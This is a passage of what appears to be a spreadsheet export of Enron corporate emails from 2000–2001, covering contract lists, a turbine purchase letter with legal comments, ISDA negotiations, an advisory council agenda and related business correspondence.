 for the first time and wish to continue, subscribe now    To stop receivin=_x000D_
g this letter, unsubscribe now    If you are having trouble receiving this =_x000D_
e-mail, please let us know  or  call (800) WILLIAMS (800-945-5426) weekdays=_x000D_
, 7am-7pm CST.    Comments? Suggestions? Let us  know  or  call (800) WILLI=_x000D_
AMS (800-945-5426) weekdays, 7am-7pm CST.    Copyright 2001 Williams Energy=_x000D_
 News Live, LLC. All  Rights Reserved.  =09=09=09=09=09_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 01:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bob.hillier@enron.com'})</t>
  </si>
  <si>
    <t>RE: ASAP-Preliminary List of Online Contracts</t>
  </si>
  <si>
    <t xml:space="preserve">713/646-3490_x000D_
_x000D_
_x000D_
_x000D_
	Bob Hillier/ENRON@enronXgate_x000D_
	01/22/2001 08:11 AM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: RE: ASAP-Preliminary List of Online Contracts_x000D_
_x000D_
Tana, the contact that told me he had a electronic copy for BEA Weblogic just _x000D_
dropped off a hard copy for me as he has not been able to locate the _x000D_
electronic copy.  If you can send me a fax number I can fax this to you._x000D_
_x000D_
bbh_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Jones, Tana  _x000D_
Sent: Thursday, January 18, 2001 6:40 PM_x000D_
To: Kitchen, Louise; Samuels, Dave; Shah, Kal; Ayala, Carmen; Webb, Jay; _x000D_
Pavetto, John; Hillier, Bob; Goddard, Paul; Boyd, Justin_x000D_
Cc: Koehler, Anne; Taylor, Mark_x000D_
Subject: ASAP-Preliminary List of Online Contracts_x000D_
_x000D_
Attached is what I hope is a pretty complete list of the EnronOnline _x000D_
contracts I have been made aware of.  There are a few I have open questions _x000D_
about  or am waiting to receive copies of the contract.  Can each of you _x000D_
please take a look and think about whether there are any others we may be _x000D_
missing.  Again, my time frame is short here, so if I can get your response _x000D_
promptly I would be most appreciative._x000D_
_x000D_
 &lt;&lt; File: ENRONONLINE COMMERCIAL &amp; TECHNICAL  AGREEMENTS.doc &gt;&gt; _x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Fri, 4 May 2001 10:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Weekly Total Crude and PADD II Crude Scatter Graphs</t>
  </si>
  <si>
    <t>The information contained herein is based on sources that we believe to be_x000D_
reliable, but we do not represent that it is accurate or complete.  Nothing_x000D_
contained herein should be considered as an offer to sell or a solicitation_x000D_
of an offer to buy any financial instruments discussed herein.  Any_x000D_
opinions expressed herein are solely those of the author.  As such, they_x000D_
may differ in material respects from those of, or expressed or published by_x000D_
on behalf of Carr Futures or its officers, directors, employees or_x000D_
affiliates.  , 2001 Carr Futures_x000D_
_x000D_
_x000D_
The charts are now in the most recent version of Adobe Acrobat 4.0 and they_x000D_
should print clearly from Adobe Acrobat Reader 3.0 or higher. Adobe Acrobat_x000D_
Reader 4.0 may be downloaded for FREE from www.adobe.com._x000D_
_x000D_
(See attached file: PADDIIstocks&amp;price.pdf)(See attached file:_x000D_
CrudeDeviation(xJun90-Jan91).pdf)_x000D_
_x000D_
_x000D_
Carr Futures_x000D_
150 S. Wacker Dr., Suite 1500_x000D_
Chicago, IL 60606  USA_x000D_
Tel:  312-368-6149_x000D_
Fax:  312-368-2281_x000D_
soblander@carrfut.com_x000D_
http://www.carrfut.com_x000D_
 - PADDIIstocks&amp;price.pdf_x000D_
 - CrudeDeviation(xJun90-Jan91).pdf</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 02:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: EEI Response to Strawman</t>
  </si>
  <si>
    <t>I recieved the same document.  If you would distribute it to the committee _x000D_
that would be appreciated.  I would think we might want to discuss it at the _x000D_
Board meeting prior to setting up another meeting with EEI.  What do you _x000D_
think?  I can see pros and cons of meeting with EEI prior to the next Board _x000D_
meeting._x000D_
_x000D_
Depending on the strawman I feel we are beginning to lose key support from _x000D_
the Board to work this matter.  Bill we need to get the Board to continue to _x000D_
follow him if we are to make progress.</t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 04:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.skilling@enron.com', 'john.sherriff@enron.com', 'kevin.hannon@enron.com', 'ken.rice@enron.com', 'cliff.baxter@enron.com', 'stanley.horton@enron.com', 'andrew.fastow@enron.com', 'david.delainey@enron.com', 'james.derrick@enron.com', 'mark.frevert@enron.com', 'greg.whalley@enron.com', 'richard.causey@enron.com', 'kenneth.lay@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Expertfinder - The Power of Who</t>
  </si>
  <si>
    <t xml:space="preserve">FYI - this email will go out to employees tonight.  _x000D_
_______________________________________________________________________________x000D_
_________x000D_
_x000D_
_x000D_
The Enron Corporate Policy Committee introduces Expertfinder._x000D_
_x000D_
Expertfinder allows you to locate people within the Enron community by _x000D_
organization structure, skills, reporting relationships, languages, school _x000D_
attended, and prior work experience. _x000D_
_x000D_
Expertfinder is a secured HR application that is available upon completion of _x000D_
your Certificate of Compliance.   Expertfinder can be accessed on the Enron _x000D_
Intranet by typing the following URL at the Internet Explorer command line _x000D_
and Log In using the HRGIS Id provided below:  _x000D_
_x000D_
https://hrglobal.enron.com_x000D_
_x000D_
Your HRGIS Id:_x000D_
Your Password:  Date of Birth (Format YYYYMMDD)  _x000D_
*Current users of the Global Launch Zone will maintain the same password._x000D_
_x000D_
If you don't remember your password, click on Forgot ID/Password below the _x000D_
Log In button.  Should you have any questions regarding access or data issues _x000D_
in Expertfinder contact the HRGIM Line (HR Global Information Management) at _x000D_
713-853-5666.  _x000D_
_x000D_
Expertfinder is only as good as the data provided.  Does your personal data _x000D_
need updating?  Go to eHRonline.enron.com or home.enron.co.uk/hrol_caller.htm _x000D_
(Eastern Hemisphere only) to update your data today.  Or, contact your HR _x000D_
Generalist for business unit related updates.  _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 04:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeffrey.hodge@enron.com', 'ben.jacoby@enron.com', 'chris.booth@enron.com', 'jkeffer@kslaw.com'})</t>
  </si>
  <si>
    <t>NW my comments in blue</t>
  </si>
  <si>
    <t>March 23, 2001_x000D_
_x000D_
_x000D_
=20_x000D_
Enron North America Corp._x000D_
1400 Smith Street=20_x000D_
Houston, TX  77002-7361_x000D_
Attention:  Benjamin F. Jacoby_x000D_
                 Executive Director_x000D_
_x000D_
Re:  Acquisition of General Electric 7EA Turbines_x000D_
_x000D_
Ladies and Gentlemen:_x000D_
_x000D_
Pursuant to our discussions last week, the following summarizes the main=20_x000D_
commercial terms agreed to by NorthWestern Corporation (=01&amp;NorthWestern=01=_x000D_
8) and=20_x000D_
Enron North America Corp. ("ENA") regarding NorthWestern=01,s purchase thro=_x000D_
ugh=20_x000D_
the LLC referred to below or as otherwise accomplished without violation of=_x000D_
=20_x000D_
the Turbine Contract referred to below (the =01&amp;Purchase=018) of two (2) Ge=_x000D_
neral=20_x000D_
Electric (=01&amp;GE=018) 7EA combustion turbines (the =01&amp;Turbines=018), the f=_x000D_
irst of which=20_x000D_
is presently located at a GE storage facility, and the second of which is=_x000D_
=20_x000D_
scheduled to be available for delivery in February, 2002, and both of which=_x000D_
=20_x000D_
are subject to purchase from GE under an agreement with GE dated as of May=_x000D_
=20_x000D_
31, 2000 (the =01&amp;Turbine Contract=018) with respect to which ENA has the r=_x000D_
ight to=20_x000D_
cause a joint venture limited liability company in which, prior to commerci=_x000D_
al=20_x000D_
operation of the Turbines, ENA holds a 20% equity interest and a wholly-own=_x000D_
ed=20_x000D_
NorthWestern subsidiary (the =01&amp;NorthWestern Subsidiary=018) holds an 80% =_x000D_
equity=20_x000D_
interest (the =01&amp;LLC=018) to become the purchaser:_x000D_
_x000D_
1.  Purchase Price:  NorthWestern will pay ENA $48.0 million for the Turbin=_x000D_
es=20_x000D_
(subject to adjustment as described below). [Adjusted how?  Need specific=_x000D_
=20_x000D_
reference. Is the statement that the payment is for the turbines consistent=_x000D_
=20_x000D_
with the structure?  Definitely sounds like a UCC deal,  for what that=01,s=_x000D_
=20_x000D_
worth.]_x000D_
2.  Closing Date of Purchase:  The Purchase will close on a date on or prio=_x000D_
r=20_x000D_
to September 1, 2001, as selected by NorthWestern by not less than 30 days=_x000D_
=01,=20_x000D_
written notice to ENA,(provided that such notice may not be given less than=_x000D_
=20_x000D_
30 days after the signing of a definitive agreement relating to the=20_x000D_
Purchase).  [What happens at closing?  Payment of the balance?  In the=20_x000D_
interim are we going to be obligated to perform under the GE contract in a=_x000D_
=20_x000D_
certain manner?  Are we taking on implied obligations to NW?]_x000D_
3.  Cash Down Payment:  NorthWestern will pay ENA an $8.0 million down=20_x000D_
payment for the Turbines.  The first installment ($3.0 million) of the $8.0=_x000D_
=20_x000D_
million down payment will be due upon the signing of a definitive agreement=_x000D_
=20_x000D_
with ENA providing for the Purchase.  The second installment ($5.0 million)=_x000D_
=20_x000D_
of the $8.0 million down payment will be due at the earlier of (i) closing =_x000D_
of=20_x000D_
the Purchase, or (ii) July 15, 2001. [The remaining $40m due at closing, as=_x000D_
=20_x000D_
well as any other amounts due to changes, etc?]_x000D_
4.  Liquidated Damages:   If, prior to the assignment of the Turbine Contra=_x000D_
ct=20_x000D_
[is proper reference to closing?], the purchaser under the Turbine Contract=_x000D_
=20_x000D_
receives any liquidated damages under the Turbine Contract, then ENA will=_x000D_
=20_x000D_
give notice thereof to NorthWestern as promptly as possible. [Then what?]_x000D_
5.  Carry Period:  ENA will provide an interest-free carry on the unpaid=20_x000D_
purchase price of the Turbines until July 15, 2001. If the closing of the=_x000D_
=20_x000D_
Purchase occurs after July 15, 2001, then the unpaid purchase price of the=_x000D_
=20_x000D_
Turbines will be increased by interest at the rate of 7.5% per annum on the=_x000D_
=20_x000D_
unpaid purchase price of the Turbines ($40.0 million) for each day from, an=_x000D_
d=20_x000D_
including, July 15, 2001 to, but excluding, the closing date._x000D_
6.  Dual Fuel Conversion on Unit 2:  ENA will not proceed with this change=_x000D_
=20_x000D_
order to effect the conversion.  Instead, it will be the responsibility of=_x000D_
=20_x000D_
NorthWestern to effect the change order with GE.  [does this mean they will=_x000D_
=20_x000D_
be negotiating a change order while E Next is still the purchaser? Are we=_x000D_
=20_x000D_
committing to pay for the increase?  Does the purchase price increase?  Is=_x000D_
=20_x000D_
there a limit?]_x000D_
7.  Unpaid Price of Second Turbine:  At the time of closing, one or more=20_x000D_
installments of the purchase price of the second Turbine will be payable to=_x000D_
=20_x000D_
GE under the Turbine Contract (the =01&amp;Unpaid Installments=018).  ENA will =_x000D_
be=20_x000D_
obligated to pay the Unpaid Installments to GE as they become due under the=_x000D_
=20_x000D_
Turbine Contract.=20_x000D_
8.  Guarantees:   There will be no guarantee by Enron Corporation of any of=_x000D_
=20_x000D_
the representations, warranties, covenants, indemnities or other obligation=_x000D_
s=20_x000D_
of ENA in connection with the Purchase.  All obligations of the LLC under t=_x000D_
he=20_x000D_
Turbine Contract, as well as all obligations of the NorthWestern Subsidiary=_x000D_
=20_x000D_
to ENA in connection with the transaction, will be guaranteed by NorthWeste=_x000D_
rn=20_x000D_
Corporation._x000D_
_x000D_
[governing law? Limit on remedies/damages for this letter? Dispute resoluti=_x000D_
on?_x000D_
_x000D_
NorthWestern and ENA have acknowledged that, subject to review and approval=_x000D_
=20_x000D_
of the structure of the Purchase and the negotiation of final documentation=_x000D_
=20_x000D_
relating to the Purchase (which documentation will incorporate the commerci=_x000D_
al=20_x000D_
terms set forth above), the above commercial terms have received all=20_x000D_
necessary NorthWestern and ENA internal approvals. [Is this true for Enron?=_x000D_
] =20_x000D_
In light of this acknowledgement, NorthWestern and ENA (by signing this=20_x000D_
letter in the space provided below and returning the same to NorthWestern)=_x000D_
=20_x000D_
agree to negotiate, in good faith, to agree upon such structure and such=20_x000D_
documentation, with a view to executing and delivering a mutually acceptabl=_x000D_
e=20_x000D_
definitive agreement relating to the Purchase as promptly as practicable. F=_x000D_
or=20_x000D_
the avoidance of any doubt, it is expressly stated, acknowledged and agreed=_x000D_
=20_x000D_
that each of NorthWestern and ENA must be satisfied with such structure and=_x000D_
=20_x000D_
such documentation in its own discretion._x000D_
_x000D_
[I question whether there is enough wiggle to keep this from being a bindin=_x000D_
g=20_x000D_
obligation to sell]_x000D_
_x000D_
By agreeing to the commercial terms set forth in this letter (by signing th=_x000D_
is=20_x000D_
letter in the space provided below and returning the same to NorthWestern),=_x000D_
=20_x000D_
ENA grants NorthWestern, and NorthWestern grants ENA, an exclusive =01&amp;no s=_x000D_
hop=018=20_x000D_
period through the close of business on Friday, April 13, 2001; and ENA=20_x000D_
agrees that, during such =01&amp;no shop=018 period, ENA will not discuss or ne=_x000D_
gotiate,=20_x000D_
directly or indirectly, with any person or entity other than NorthWestern f=_x000D_
or=20_x000D_
or in respect of the purchase or other acquisition by such person or entity=_x000D_
=20_x000D_
of the Turbines; and NorthWestern agrees that, during such =01&amp;no shop=018 =_x000D_
period,=20_x000D_
NorthWestern will not discuss or negotiate, directly or indirectly, with an=_x000D_
y=20_x000D_
person or entity other than ENA for or in respect of the purchase or other=_x000D_
=20_x000D_
acquisition by NorthWestern of turbines from such person or entity..  As=20_x000D_
consideration for ENA agreeing to such =01&amp;no shop=018 period, NorthWestern=_x000D_
 will=20_x000D_
pay to ENA, via wire transfer on the date of receipt by NorthWestern of ENA=_x000D_
=01,s=20_x000D_
signed agreement, $1.0 million (the =01&amp; No Shop Payment=018).  The No Shop=_x000D_
 Payment=20_x000D_
will not be subject to refund by ENA for any reason or upon any circumstanc=_x000D_
e=20_x000D_
(including, without limitation, failure of NorthWestern and ENA to agree up=_x000D_
on=20_x000D_
the structure of, and enter into a definitive agreement relating to, the=20_x000D_
Purchase). =20_x000D_
_x000D_
If ENA is in agreement with the foregoing, then please so indicate by signi=_x000D_
ng=20_x000D_
this letter in the space provided below and returning the same to=20_x000D_
NorthWestern (by facsimile at 605/978-2840 and to the attention of the=20_x000D_
undersigned)._x000D_
_x000D_
_x000D_
       Very truly yours,_x000D_
_x000D_
_x000D_
       NORTHWESTERN CORPORATION_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
       ______________________________x000D_
       By: Michael J. Young_x000D_
       Title: Senior Corporate Counsel_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
AGREED AS AFORESAID AS OF THIS 23rd  DAY OF MARCH 2001:_x000D_
_x000D_
_x000D_
ENRON NORTH AMERICA CORP._x000D_
_x000D_
_________________________________x000D_
By: Benjamin F. Jacoby_x000D_
Title: Executive Director_x000D_
_x000D_
_x000D_
[Need a different Enron signatory]</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 04:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'yyaish@aeglobalmarkets.com'})</t>
  </si>
  <si>
    <t>RE: ISDA Schedule/Paragraph 13</t>
  </si>
  <si>
    <t>Sara, my e-mails from ML have not been forwarding to me, but Tom Orr has_x000D_
apparently accepted Tracy's reasoning behind the transfer provision.  I_x000D_
have, therefore, simply incorporated the provision from your e-mail below_x000D_
and added it as (d) to the ISDA.  In addition, I have added some comments to_x000D_
the CSA (though the one on Custodian requires some thought). Though the ISDA_x000D_
was being drafted at Enron, I have taken the liberty of simply accepting all_x000D_
changes and attaching a clean document as well.  Let me know your thoughts_x000D_
and when u think we can execute._x000D_
_x000D_
Yair Yaish, Esq._x000D_
Director and Senior Counsel_x000D_
Allegheny Energy Global Markets, LLC_x000D_
212-224-8671_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sara.Shackleton@enron.com [mailto:Sara.Shackleton@enron.com]_x000D_
Sent: Friday, April 13, 2001 4:25 PM_x000D_
To: YYaish@exchange.ml.com_x000D_
Subject: RE: ISDA Schedule/Paragraph 13_x000D_
_x000D_
_x000D_
Yair:_x000D_
_x000D_
Tracy has agreed to the language below which would be added as (d) to the_x000D_
"Transfer" section:_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 04/13/2001 03:22 PM -----_x000D_
_x000D_
_x000D_
                    Sara_x000D_
_x000D_
                    Shackleton           To:     Tracy Ngo/PDX/ECT_x000D_
_x000D_
                                         cc:_x000D_
_x000D_
                    04/13/2001           Subject:     RE: ISDA_x000D_
Schedule/Paragraph 13(Document link: Sara_x000D_
                    03:13 PM             Shackleton)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Tracy, how is this:_x000D_
_x000D_
Regarding the "Transfer" language for Allegheny (Party B), we have the_x000D_
following proposal:_x000D_
_x000D_
"Party B may transfer its rights and obligations under this Agreement, in_x000D_
whole but not in part, to any Affiliate provided that (1) such transfer_x000D_
will not give rise to a Termination Event or an Event of Default, and (2)_x000D_
(i) the creditworthiness of the Affiliate is not materially weaker than_x000D_
that of Party B immediately prior to such transfer, unless Party B provides_x000D_
a satisfactory guaranty or credit support to the Affiliate, or (ii) the_x000D_
proposed Affiliate satisfies the criteria that Party A applies in deciding_x000D_
whether to offer or make an extension of credit or to enter into_x000D_
transactions similar to the Transactions subject to the proposed transfer."_x000D_
_x000D_
_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    "Yaish, Yair_x000D_
_x000D_
                    (OGC)"                To:_x000D_
"'Sara.Shackleton@enron.com'" &lt;Sara.Shackleton@enron.com&gt;_x000D_
                    &lt;YYaish@exchan        cc:_x000D_
_x000D_
                    ge.ml.com&gt;            Subject:     RE: ISDA_x000D_
Schedule/Paragraph 13_x000D_
_x000D_
_x000D_
                    04/13/2001_x000D_
_x000D_
                    08:42 AM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
I hope to leave by 3:30 Eastern Time.  Thanks for getting back to me so_x000D_
quickly.  Though, I'm surprised u guys are open for business today._x000D_
_x000D_
-----Original Message-----_x000D_
From: Sara.Shackleton@enron.com [mailto:Sara.Shackleton@enron.com]_x000D_
Sent: Friday, April 13, 2001 9:41 AM_x000D_
To: YYaish@exchange.ml.com_x000D_
Subject: RE: ISDA Schedule/Paragraph 13_x000D_
_x000D_
_x000D_
_x000D_
Yair:_x000D_
_x000D_
I've left a message with Tracy Ngo (in Portland) and will let you know as_x000D_
soon as I hear from her.  How long will you be in the office today?_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
_x000D_
_x000D_
                    "Yaish, Yair_x000D_
                    (OGC)"                To:_x000D_
"'Sara.Shackleton@enron.com'" &lt;Sara.Shackleton@enron.com&gt;_x000D_
                    &lt;YYaish@exchan        cc:_x000D_
                    ge.ml.com&gt;            Subject:     RE: ISDA_x000D_
Schedule/Paragraph 13_x000D_
_x000D_
                    04/13/2001_x000D_
                    08:28 AM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sara, Allegheny would like to be able to assign to affilaites in the same_x000D_
manner that we are allowing Enron to make an ssignment so long as the Gty_x000D_
goes along.  In our case, however, there is no gty, hence the stipualtion_x000D_
that such assignment must be to an entity with an equal or better credit_x000D_
rating.  If you wish, I can limit such assignment to an entity rated at_x000D_
least BBB+ or better.  Would that resolve your concerns?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sara.Shackleton@enron.com [mailto:Sara.Shackleton@enron.com]_x000D_
Sent: Thursday, April 12, 2001 12:26 PM_x000D_
To: YYaish@exchange.ml.com_x000D_
Subject: RE: ISDA Schedule/Paragraph 13_x000D_
_x000D_
_x000D_
_x000D_
Yair:_x000D_
_x000D_
It's a good thing you didn't try to get back to me!  Sorrry._x000D_
_x000D_
(See attached file: AlleghenyCPformacceptR1.DOC)_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
_x000D_
_x000D_
                    "Yaish, Yair_x000D_
                    (OGC)"                To:_x000D_
"'Sara.Shackleton@enron.com'" &lt;Sara.Shackleton@enron.com&gt;_x000D_
                    &lt;YYaish@exchan        cc:_x000D_
                    ge.ml.com&gt;            Subject:     RE: ISDA_x000D_
Schedule/Paragraph 13_x000D_
_x000D_
                    04/12/2001_x000D_
                    10:16 AM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sara, sorry i didn't get back to you yesterday, I was out sick.  I didn't_x000D_
notice anything attached, did u send a subsequent e-mail?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sara.Shackleton@enron.com [mailto:Sara.Shackleton@enron.com]_x000D_
Sent: Wednesday, April 11, 2001 4:01 PM_x000D_
To: YYaish@exchange.ml.com_x000D_
Cc: Tracy.Ngo@enron.com_x000D_
Subject: RE: ISDA Schedule/Paragraph 13_x000D_
Importance: High_x000D_
_x000D_
_x000D_
_x000D_
Yair:_x000D_
_x000D_
Attached is my redline.  Call me so that we can discuss the remaining_x000D_
issues, including:_x000D_
_x000D_
(1)  Calculation Agent.  We believe that the existing dispute mechanism is_x000D_
adequate._x000D_
_x000D_
(2)  Procedures for Entering into Transactions.  There is no procedure for_x000D_
dual confirms.  This is too confusing._x000D_
_x000D_
(3)  Transfer.  We cannot agree to your assignment provision as it is too_x000D_
subjective._x000D_
_x000D_
The other changes were not substantive._x000D_
_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
_x000D_
_x000D_
                    "Yaish, Yair_x000D_
                    (OGC)"                To:_x000D_
"'Sara.Shackleton@enron.com'" &lt;Sara.Shackleton@enron.com&gt;_x000D_
                    &lt;YYaish@exchan        cc:_x000D_
                    ge.ml.com&gt;            Subject:     RE: ISDA_x000D_
Schedule/Paragraph 13_x000D_
_x000D_
                    04/10/2001_x000D_
                    07:46 AM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sara, any thoughts on my comments ISDA I sent out last week?_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Yaish, Yair (OGC)_x000D_
Sent: Thursday, April 05, 2001 6:19 PM_x000D_
To: 'Sara.Shackleton@enron.com'_x000D_
Subject: RE: ISDA Schedule/Paragraph 13_x000D_
_x000D_
_x000D_
Sara, I have good news, I think we are very close to executing this baby._x000D_
_x000D_
I am attahcing comments to the ISDA.  They reflect comments by our outside_x000D_
cousel which highlight the differences between this contract and the side_x000D_
letter/ML ISDA.  They are not much.  I have also made some changes directly_x000D_
on their draft where I either concurred with Enron or needed to make some_x000D_
of my own changes.  Pls review and let me know what you think._x000D_
_x000D_
I will be leaving the office soon, so if we can wrap it up tomorrow that_x000D_
would be great (I'm out Monday for Passover)._x000D_
_x000D_
_x000D_
Yair Yaish_x000D_
Director and Senior Counsel_x000D_
Allegheny Energy Global Markets, LLC_x000D_
212-236-7346_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sara.Shackleton@enron.com [mailto:Sara.Shackleton@enron.com]_x000D_
Sent: Friday, March 30, 2001 4:10 PM_x000D_
To: yyaish@exchange.ml.com_x000D_
Subject: ISDA Schedule/Paragraph 13_x000D_
_x000D_
_x000D_
Yair:_x000D_
_x000D_
Attached is a blacklined (against the Enron North America Corp. draft of_x000D_
3/15/01) Schedule and Paragraph 13 to the ISDA Credit Support Annex.  I_x000D_
have tried to incorporate the essence of the March 19, 2001 "swap side_x000D_
letter agreement."  Please call me to discuss as it would be nice to_x000D_
finalize by April 6.  Thanks._x000D_
_x000D_
(See attached file: 098a Blackline ctr (Allegheny Energy Supply).doc)_x000D_
_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - ENA-AYE ISDA -- YY Comments v2.DOC_x000D_
 - ENA-AYE ISDA-- Final v2.DOC</t>
  </si>
  <si>
    <t>Tue, 18 Jul 2000 04:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mcatherine@idahopower.com'})</t>
  </si>
  <si>
    <t>Hi,  Debra:_x000D_
I left  you a voice mail about the partial force majeure and I'll wait to _x000D_
hear from you  once you get feedback from credit on thresholds and from legal _x000D_
on cross  default.? The attached document includes our notice  information._x000D_
Regards,_x000D_
Michelle_x000D_
IDACORP Energy_x000D_
 - Enron IDACORPEnergyAmendment(June299).doc</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 12:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'klay@enron.com', 'vanessa.groscand@enron.com', 'skean@enron.com', 'rosalee.fleming@enron.com'})</t>
  </si>
  <si>
    <t>Agenda for advisory council April 10-11</t>
  </si>
  <si>
    <t>Judging from the latest agenda, we seem to have had a communications_x000D_
mix-up: Grundfest can't come, etc. So let me set out my understanding of the_x000D_
agenda as it now exists. We should keep this flexible as I have taken the_x000D_
liberty of inviting Karl Shapiro, from Berkeley, to join us and make a_x000D_
presentation based on his experience in the Intel, Microsoft and related_x000D_
cases, and in the FTC action against BP's entry into trading. Karl has_x000D_
written the best book on the subject of network monopolies, copies of which I_x000D_
will circulate if he says "yes", which I will know by Tuesday mid-day. The_x000D_
point of his presentation would be to consider whether Enron's "dominance" of_x000D_
some of the markets in which it operates and which it makes contains the_x000D_
seeds of future problems. If we land Shapiro, we can move Kristol back to the_x000D_
dinner slot, or fold the California session into the dinner report by Enron_x000D_
executives._x000D_
I would suggest that we advise those who received the agenda that it is_x000D_
being substantially revised, lest those that I have told to prepare talks_x000D_
think they are off the hook, and Davies gets upset about the schedule. We can_x000D_
then send out a final agenda later this week._x000D_
I have briefed Kristol, Portney, Davies and Ghemawat to try to make their_x000D_
presentations a bit more Enron-specific than in the past._x000D_
Dinner_x000D_
Usual review by Enron executives of latest developments._x000D_
Wednesday_x000D_
Because my understanding is that Gavyn Davies has to leave early, we_x000D_
should schedule the economic review by him and by Larry Kudlow as the first_x000D_
presentation._x000D_
8:00-8:45 Gavyn Davies: Developments in the world     economy, with special_x000D_
emphasis on those that might affect Enron._x000D_
8:45-9:30 Larry Kudlow: Developments in the US economy; likely policy_x000D_
reactions._x000D_
9:30-10:30 Discussion, perhaps with Jeff leading off with "what worries us_x000D_
most"._x000D_
10:30-11:00 Coffee break and continued discussion._x000D_
11:00-12:00 The California situation: Report by Enron and discussion of the_x000D_
implications of the California situation for future policy and Enron_x000D_
prospects._x000D_
12:00-12:30 The political situation: Bill Kristol._x000D_
12:30-1:30 Lunch and discussion of Kristol report, with Ken Lay adding his_x000D_
information and appraisal._x000D_
1:30-2:00 Environmental policy: with emphasis on whether recent changes are_x000D_
likely to affect Enron. Paul Portney._x000D_
2:00-2:30 Discussion of Portney presentation._x000D_
2:30-3:00 The availability to Enron of human capital. Pankaj Ghemawat will_x000D_
review what he and his Harvard colleagues, as well as other experts, are_x000D_
saying about the ability of companies such as Enron, no longer small, to_x000D_
continue to attract the best and the brightest._x000D_
3:00-3:45: Discussion of Pankaj's presentation, perhaps led by Steve Kean.</t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 08:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: Payment of GE Invoice</t>
  </si>
  <si>
    <t xml:space="preserve">I've answered all their questions, and have suggested to Chris that he ask _x000D_
NorthWestern for audited financials.  Marissa is preparing a letter which _x000D_
briefly outlines the deal, since GE had requested a letter identifying the _x000D_
parties, the payment obligations, etc.  I've given them all this information _x000D_
previously in phone calls and by email, but I think they want something _x000D_
official looking.  Probably be a good idea for you to sign the letter._x000D_
_x000D_
I don't think they will trade payment for a consent, but I could be wrong.  _x000D_
It just isn't enough money, and GE isn't strapped for cash anyway.  I'd want _x000D_
to be careful that we don't trip up on E - Next obligations._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
From: Ben Jacoby/ENRON@enronXgate on 06/06/2001 01:09 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: FW: Payment of GE Invoice_x000D_
_x000D_
Kay:_x000D_
_x000D_
I'd like to hold payment on this invoice until we receive the consent from _x000D_
GE. Any update?_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Walker, Rebecca  _x000D_
Sent: Wednesday, June 06, 2001 9:59 AM_x000D_
To: Jacoby, Ben_x000D_
